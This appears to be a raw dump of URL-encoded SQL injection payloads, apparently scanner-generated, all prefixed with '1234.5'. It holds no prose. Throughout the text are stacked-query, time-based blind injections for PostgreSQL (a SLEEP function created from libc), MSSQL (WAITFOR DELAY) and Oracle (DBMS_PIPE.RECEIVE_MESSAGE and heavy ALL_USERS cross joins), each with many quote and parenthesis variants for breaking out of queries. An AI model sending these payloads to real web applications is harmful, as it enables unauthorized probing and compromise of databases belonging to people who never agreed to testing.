1234.5%27%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%27%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%27%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%27%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%22%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%22%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%22%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%22%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%22%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%22%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%25%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%25%27%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%25%27%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%25%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%00%27%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%00%27%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%27%29%20WHERE%208883%3D8883%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%22%29%20WHERE%208216%3D8216%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%29%20WHERE%207469%3D7469%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%27%20WHERE%201748%3D1748%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%22%20WHERE%202891%3D2891%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%20WHERE%206079%3D6079%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%27%7C%7C%28SELECT%20%27uJBL%27%20FROM%20DUAL%20WHERE%202865%3D2865%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%27%7C%7C%28SELECT%20%27Zpbk%27%20WHERE%204272%3D4272%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%27%2B%28SELECT%20rrsh%20WHERE%202797%3D2797%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%27%2B%28SELECT%20%27MbGi%27%20WHERE%203459%3D3459%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29-- 1234.5%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%25%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%25%27%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%25%27%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%25%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%00%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%00%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%29%20WHERE%201253%3D1253%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%29%20WHERE%207709%3D7709%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%29%20WHERE%201970%3D1970%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%20WHERE%208092%3D8092%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%22%20WHERE%209617%3D9617%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%20WHERE%201862%3D1862%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%7C%7C%28SELECT%20%27xYjl%27%20FROM%20DUAL%20WHERE%207299%3D7299%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%7C%7C%28SELECT%20%27uPMq%27%20WHERE%207872%3D7872%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%2B%28SELECT%20Llnv%20WHERE%202520%3D2520%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%2B%28SELECT%20%27NCrh%27%20WHERE%202317%3D2317%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27-- 1234.5%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%27%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%27%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%27%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%27%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%22%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%22%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%22%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%22%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%22%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%22%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%25%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%25%27%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%25%27%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%25%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%00%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%00%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%27%29%20WHERE%207964%3D7964%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%22%29%20WHERE%204315%3D4315%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%29%20WHERE%204053%3D4053%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%27%20WHERE%205653%3D5653%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%22%20WHERE%201658%3D1658%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%20WHERE%201040%3D1040%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%27%7C%7C%28SELECT%20%27pGwJ%27%20FROM%20DUAL%20WHERE%201140%3D1140%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%27%7C%7C%28SELECT%20%27SDoK%27%20WHERE%205261%3D5261%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%27%2B%28SELECT%20dzVp%20WHERE%208168%3D8168%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%27%2B%28SELECT%20%27KDXq%27%20WHERE%207854%3D7854%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%28122%29%7C%7CCHR%28105%29%7C%7CCHR%2868%29%7C%7CCHR%28122%29%2C5%29%20FROM%20DUAL-- 1234.5%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%25%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%25%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%25%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%25%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%00%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%00%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%27%29%20WHERE%207574%3D7574%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%22%29%20WHERE%203928%3D3928%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%29%20WHERE%207916%3D7916%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 1234.5%27%20WHERE%206665%3D6665%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5-- 